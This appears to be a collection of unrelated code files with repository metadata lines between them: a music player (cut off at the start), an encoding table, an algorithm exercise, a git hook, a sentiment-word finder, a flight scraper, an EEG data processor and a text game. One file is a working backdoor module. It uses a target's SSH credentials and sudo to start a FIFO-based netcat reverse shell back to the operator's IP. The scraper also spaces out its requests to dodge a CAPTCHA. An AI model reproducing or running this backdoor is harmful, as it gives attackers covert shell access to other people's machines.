if message.type == gst.MESSAGE_EOS:
            self.next()
    # Main thread function: plays tracks in a loop
def mainloop(self):
while True:
#print self.title,self.url
self.player.set_property('uri', self.url)
self.player.set_state(gst.STATE_PLAYING)
self.playing = True
            # Put the thread into a wait state until it receives a wake-up signal
self.event.wait()
self.event.clear()
    # Play / pause toggle
def pause(self):
if self.playing:
self.player.set_state(gst.STATE_PAUSED)
self.playing = False
            print 'Paused'
else:
self.player.set_state(gst.STATE_PLAYING)
self.playing = True
            print 'Resumed playback'
    # Next track
def next(self):
self.player.set_state(gst.STATE_NULL)
self.event.set()
key = random.choice(self.music2type.keys())
self.title = random.choice(self.music2type[key].keys())
self.url = self.music2type[key][self.title]
print "播放:",self.title
# 开启主播放线程
def run(self):
self.thread = threading.Thread(target=self.mainloop)
self.thread.setDaemon(True)
self.thread.start()
while True:
if not self.thread.isAlive(): break
    # Destroy the player; no clean way to stop the playback thread has been found yet
def destroy(self):
self.thread._Thread__stop()
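# Hedged sketch (added; not part of the original player): the same wait/set
# handshake that mainloop() and next() rely on, shown in isolation.
def _event_handshake_demo():
    evt = threading.Event()
    def worker():
        evt.wait()   # blocks, like mainloop() between tracks
        evt.clear()  # re-arm for the next signal
    t = threading.Thread(target=worker)
    t.start()
    evt.set()        # wake the worker, as next() does
    t.join()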
# Main console playback interface
class MusicMainConsole():
def __init__(self):
self.fm = MusicBase()
self.fm.run()
def sigint_handler(signum, frame):
print ("exit")
sys.exit()
if __name__ == '__main__':
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigint_handler)
random.seed(time.time())
MusicMainConsole()
| mit | 7,971,246,647,054,509,000 | 25.02 | 67 | 0.577633 | false |
wittrup/crap | python/encoding.py | 1 | 1363 |
N = 0 # character never appears in text
A = 1 # character appears in plain ASCII text
I = 2 # character appears in ISO-8859 text
X = 3 # character appears in non-ISO extended ASCII (Mac, IBM PC)
text_chars = [
# BEL BS HT LF VT FF CR
N, N, N, N, N, N, N, A, A, A, A, A, A, A, N, N, # 0x0X
# ESC
N, N, N, N, N, N, N, N, N, N, N, A, N, N, N, N, # 0x1X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x2X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x3X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x4X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x5X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x6X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, N, # 0x7X
# NEL
X, X, X, X, X, A, X, X, X, X, X, X, X, X, X, X, # 0x8X
X, X, X, X, X, X, X, X, X, X, X, X, X, X, X, X, # 0x9X
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xaX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xbX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xcX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xdX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xeX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I # 0xfX
]
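# Illustrative sketch (added; not part of the original table): tally how the
# table classifies each byte of a bytes object, file(1)-style; keys are the
# class codes N/A/I/X defined above.
def classify_bytes(data):
    counts = {N: 0, A: 0, I: 0, X: 0}
    for b in bytearray(data):
        counts[text_chars[b]] += 1
    return counts  # classify_bytes(b'hi\x00') -> {N: 1, A: 2, I: 0, X: 0}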
if __name__ == '__main__':
    print('\n'.join(str(text_chars[i:i+16]) for i in range(0, len(text_chars), 16)))
| mit | -1,026,429,806,372,490,800 | 44.466667 | 81 | 0.405723 | false |
dopplesoldner/algorithms | hash/two_sum.py | 1 | 1919 | """The goal of this problem is to implement a variant of the 2-SUM algorithm
(covered in the Week 6 lecture on hash table applications).
The file contains 500,000 positive integers (there might be some repetitions!).
This is your array of integers, with the ith row of the file specifying the ith
entry of the array.
Your task is to compute the number of target values t in the interval
[2500,4000] (inclusive) such that there are distinct numbers x,y in the input
file that satisfy x+y=t. (NOTE: ensuring distinctness requires a one-line
addition to the algorithm from lecture.)
"""
def two_sum(int_array, lb, ub):
"""return number of pairs in int_array whose sum is between lb and ub.
>>> two_sum([1, 2, 3, 4, 5], 3, 4)
2
>>> two_sum([1, 2, 3, 4, 5], 3, 3)
1
>>> two_sum([0, 1, 2, 3, 4], 3, 3)
1
>>> two_sum([-1, 1, 2, 3, 4], 2, 4)
3
"""
hash_int = {}
sum_hash = {}
for x in int_array:
if x >= ub: continue
hash_int[x] = True
for x in int_array:
if x >= ub: continue
for sum_x_y in range(lb, ub + 1):
y = sum_x_y - x
            # x < y is the one-line addition that keeps x and y distinct
            if x < y and y in hash_int:
# print '%s + %s = %s' % (x, y, sum_x_y)
sum_hash[sum_x_y] = True
return len(sum_hash)
def read_input(file_name):
int_array = []
with open(file_name) as f:
for line in f:
x = int(line)
int_array.append(x)
return int_array
def test_two_sum():
int_array = read_input('test1.txt')
sum_cnt = two_sum(int_array, 30, 60)
assert sum_cnt == 9, '%s != 9' % sum_cnt
int_array = read_input('test2.txt')
sum_cnt = two_sum(int_array, 30, 60)
assert sum_cnt == 20, '%s != 20' % sum_cnt
if __name__ == '__main__':
import doctest
doctest.testmod()
# test_two_sum()
int_array = read_input('input.txt')
    print two_sum(int_array, -10000, 10000)
| mit | 1,159,057,494,985,307,000 | 28.090909 | 79 | 0.576342 | false |
elationfoundation/git_hooks | pre-commit/python/timestamp.py | 1 | 1631 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import subprocess
from datetime import datetime
class TestSuite():
def __init__(self):
self.stdout = 0
def run(self, files):
for file_name in files:
try:
self.set_changed(file_name)
except Exception as _ee:
print(_ee)
print("Completed time stamping")
return 0
def system(self, *args, **kwargs):
kwargs.setdefault('stdout', subprocess.PIPE)
proc = subprocess.Popen(args, **kwargs)
out, err = proc.communicate()
return out
def current_time(self):
"""Current date-time"""
return datetime.now().strftime('%Y-%m-%d %H:%M')
def set_changed(self, file_name):
# watching python and lua scripts
if re.search(r"(\.py|\.lua)$", file_name):
# current script text
with open(file_name, 'r') as fd: script = fd.read()
# change modification date
try:
_now = self.current_time()
print(_now)
script = re.sub('(@changed\s*:\s+)\d{4}-\d{2}-\d{2} \d{2}:\d{2}', lambda m: m.group(1) + _now, script)
except Exception as __ee:
print(__ee)
# write back to script
with open(file_name, 'w') as fd: fd.write(script)
# add changes to commit
try:
print(file_name+"'s timestamp updated")
self.system('git', 'add', file_name)
except Exception as _ee:
print(_ee)
return 0
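# Hedged usage sketch (added; the file name is hypothetical). run() stamps
# every matching file and re-stages it with git, so calling this has side
# effects on the working tree:
def _demo_run():
    return TestSuite().run(['example.py'])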
| gpl-2.0 | 188,132,529,603,103,600 | 30.365385 | 118 | 0.505825 | false |
Weihonghao/ECM | find_emotion_word.py | 1 | 1493 | from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from tqdm import tqdm
import mmap
def whetherEmotion(word, threshold):
analyzer = SentimentIntensityAnalyzer()
sentiment_result = analyzer.polarity_scores(word)
if abs(sentiment_result['compound']) > threshold:
return True
return False
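# Hedged example (added): exact scores depend on the installed VADER lexicon;
# a strongly valenced word such as "wonderful" is expected to clear a 0.5
# compound threshold, while a neutral word like "table" is not.
def demo_whetherEmotion():
    return whetherEmotion("wonderful", 0.5)  # expected: True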
def get_line_number(file_path):
fp = open(file_path, "r+")
buf = mmap.mmap(fp.fileno(), 0)
lines = 0
while buf.readline():
lines += 1
return lines
if __name__ == '__main__':
threshold = 0.5
out = open("/commuter/chatbot/Commuter/data/emotion_vocab.txt",'w')
emotion_word_set = set()
line_number = get_line_number('/commuter/chatbot/Commuter/question.txt')
print(line_number)
f = open("/commuter/chatbot/Commuter/question.txt",'r')
for line in tqdm(f, total=line_number):#f.readlines():
line = line.strip().split()
for each in line:
if whetherEmotion(each, threshold):
emotion_word_set.add(each)
f.close()
#emotion_word_set = set()
f = open("/commuter/chatbot/Commuter/answer.txt",'r')
for line in tqdm(f, total=line_number):#f.readlines():
'''line = line.strip()
if whetherEmotion(line, threshold):
emotion_word_set.add(line)'''
line = line.strip().split()
for each in line:
if whetherEmotion(each, threshold):
emotion_word_set.add(each)
f.close()
for each in emotion_word_set:
out.write(each)
out.write("\n")
out.close()
| agpl-3.0 | 8,073,913,267,619,536,000 | 30.104167 | 73 | 0.653048 | false |
Kkevsterrr/backdoorme | backdoors/shell/netcat.py | 1 | 1739 | from backdoors.backdoor import *
import time
class Netcat(Backdoor):
prompt = Fore.RED + "(nc) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using netcat backdoor..."
self.core = core
self.options = {
"port" : Option("port", 53920, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell."
def get_command(self):
#command = "echo " + self.core.curtarget.pword + " | sudo -S bash -c \"cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f\"" % self.get_value("port")
command = "cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f" % self.get_value("port")
return command
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
self.listen(prompt="some")
#input("Enter the following command in another terminal: nc -v -n -l -p %s" % port)
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command("echo " + target.pword + " | sudo -S rm /tmp/f")
time.sleep(.5)
target.ssh.exec_command("mkfifo /tmp/f")
#target.ssh.exec_command("echo " + target.pword + " | sudo -S chmod 222 /tmp/f")
target.ssh.exec_command(self.get_command())
print(GOOD + "Netcat backdoor on port %s attempted." % port)
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
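# Illustrative note (added): the FIFO wires the listener's input into an
# interactive shell and the shell's output back over the same connection:
#   mkfifo /tmp/f
#   cat /tmp/f | /bin/bash -i 2>&1 | nc <attacker-ip> <port> > /tmp/f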
| mit | 8,729,828,714,688,870,000 | 44.763158 | 180 | 0.564117 | false |
j2ali/FlightScraper | Scraper.py | 1 | 1950 | from bs4 import BeautifulSoup
import helper
from datetime import datetime
import click
import time
import calendar
#Example values
#START_DATE = datetime(2014, 05, 15)
#END_DATE = datetime(2015, 05, 15)
#DAY_DELTA = 7
#TIMEOUT_SECONDS = 30
#Example Command
#python Scraper.py 2014/05/25 2015/05/15 4 0 YYZ POS
@click.command()
@click.argument('start_date')
@click.argument('end_date')
@click.argument('day_delta')
@click.argument('time_out')
@click.argument('origin_airport')
@click.argument('destination_airport')
def find_flights(start_date, end_date, day_delta, time_out, origin_airport, destination_airport):
start_date = datetime.strptime(start_date, "%Y/%m/%d")
end_date = datetime.strptime(end_date, "%Y/%m/%d")
day_delta = int(day_delta)
time_out = int(time_out)
flight_dates = helper.generate_dates(start_date, end_date, day_delta)
#There is a new output file for each run.
#Use something like time.ctime(int("1284101485")) to get back date
filename = calendar.timegm(datetime.utcnow().utctimetuple())
file = open('DataOut/output_'+str(filename)+'.txt', "a")
for flight_date in flight_dates:
(depart_date, return_date) = flight_date
response = helper.hit_the_site(depart_date,
return_date,
origin_airport,
destination_airport)
soup = BeautifulSoup(response)
data = helper.parse_data(soup)
if len(data) == 0:
file.writelines('No data received might have encounter captcha')
file.close()
break
for a in data:
print a
file.writelines(a.encode('utf-8'))
# Trying to avoid captcha here but looks like timeout is over 30 seconds
# I can go 10 hit then its turned on
time.sleep(time_out)
file.close()
if __name__ == '__main__':
    find_flights()
| bsd-3-clause | -3,644,755,502,807,923,000 | 31.516667 | 97 | 0.625128 | false |
sagarjauhari/BCIpy | process_series_files.py | 1 | 3765 | # /usr/bin/env python
# Copyright 2013, 2014 Justis Grant Peters and Sagar Jauhari
# This file is part of BCIpy.
#
# BCIpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BCIpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BCIpy. If not, see <http://www.gnu.org/licenses/>.
import sys, os
from os.path import isfile, join
import re
import dateutil.tz
import pandas as pd
import numpy as np
from datetime import datetime
# Create dict of machine data
def create_dict_machine_data(raw_dir):
onlyfiles_raw = [ f for f in os.listdir(raw_dir) if isfile(join(raw_dir,f)) ]
pat_raw = re.compile("[0-9]*\.[a-z0-9]*\.rawwave\.csv")
temp_dat_raw = [f.split('.')[0:2] for f in onlyfiles_raw if pat_raw.match(f)]
mach_dict = {i[1]: i[0] for i in temp_dat_raw}
return mach_dict
def create_raw_incremental(in_file, out_file, time_t, tzinfo=dateutil.tz.tzlocal()):
"Create raw file with incremental miliseconds"
raw = pd.read_csv(in_file, skipinitialspace=True, index_col=False) # avoid index to keep it from sorting
day = time_t[0:4]+"-"+time_t[4:6]+"-"+time_t[6:8]
#print day #debug
# Incoming data has 512Hz samples with timestamps at resolution of one
# second. For each second, convert the first timestamp to epoch time and
# blank out the others so that we can do linear interpolation.
# TODO estimate microseconds on first and last second, to avoid timestretch
# TODO analyze clock skew, since some seconds have more or less samples
# TODO consider a pandas.DatetimeIndex with just a start time and frequency
prev_time = None
for i,row in raw.iterrows():
timestamp = row['%Time']
if timestamp==prev_time:
raw.set_value(i, '%Time', np.NaN)
else:
timestring = day + ' ' + timestamp + '.0'
dt = datetime.strptime(timestring, '%Y-%m-%d %H:%M:%S.%f')\
.replace(tzinfo=tzinfo) # set specified tz before conversion
# time since UTC 1970-01-01 00:00:00, in seconds
dt = float(dt.strftime('%s.%f'))
raw.set_value(i, '%Time', dt)
prev_time = timestamp
timestring = day + ' ' + prev_time + '.0'
dt = datetime.strptime(timestring, '%Y-%m-%d %H:%M:%S.%f')\
.replace(tzinfo=tzinfo) # set specified tz before conversion
# time since UTC 1970-01-01 00:00:00, in seconds
dt = float(dt.strftime('%s.%f'))
raw.set_value(i, '%Time', dt+1)
# reindex with interpolated timestamps
raw.index = pd.DatetimeIndex(
pd.to_datetime(raw['%Time']\
.convert_objects(convert_numeric=True)\
.interpolate(), unit='s')
).tz_localize('UTC').tz_convert(tzinfo) # convert back to original tz
raw.to_csv(out_file, index=True, cols=['Value'])
return raw
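# Hedged example (added; the file names and timestamp are hypothetical):
# converting one 512 Hz capture recorded on 2014-05-15.
def _demo_convert_one():
    return create_raw_incremental('20140515.ab12cd.rawwave.csv',
                                  '20140515.ab12cd.rawwave_microsec.csv',
                                  '20140515')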
def process_all_in_dir(indir, outdir):
if not os.path.exists(outdir):
os.makedirs(outdir)
mach_dict = create_dict_machine_data(indir)
for i in mach_dict:
file_in = join(indir, mach_dict[i]+"."+i+".rawwave.csv")
print "processing file %s" % file_in
file_out =join(outdir, mach_dict[i]+"."+i+".rawwave_microsec.csv")
create_raw_incremental(file_in,file_out, mach_dict[i])
if __name__ == '__main__':
indir,outdir=sys.argv[1:3]
process_all_in_dir(indir,outdir)
| gpl-3.0 | 3,405,553,341,204,929,000 | 40.833333 | 108 | 0.655511 | false |
IngoBongo/rpg_texual_Rumbo_a | Rumbo_A_V0.0.1/rumbo.py | 1 | 1682 | # -*- coding: utf-8 -*-
# syntax for Python 2.7
from random import randint
import jugador
from jugador import Jugador
from criaturas import Enemigo
comand = jugador.Comandos
def main():
jug = Jugador()
jug.nombre = raw_input("¿Cual es tu nombre viager@? : ")
print "escribe: 'ayuda' para ver una lista de acciones.\n"
print "%s se adentra en una oscura cueva, en busca de aventuras."% jug.nombre
while (jug.salud > 0):
linea = raw_input("> ")
arg = linea.split()
if len(arg) > 0:
comando_valido = False
for c in comand.keys():
if arg[0] == c[: len(arg[0])]:
comand[c](jug)
comando_valido = True
break
if not comando_valido:
print "%s no entiende tu sugerencia.\n(escribe 'ayuda' para obtener una lista de obciones.)"% jug.nombre
if __name__ == '__main__':
main()
"""
{Rumbo A... aims to be a text adventure game}
Copyright (C) {2017} {by Igor Iglesia Gonzalez}
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
"""
| gpl-3.0 | 850,313,411,132,253,200 | 28.491228 | 120 | 0.650803 | false |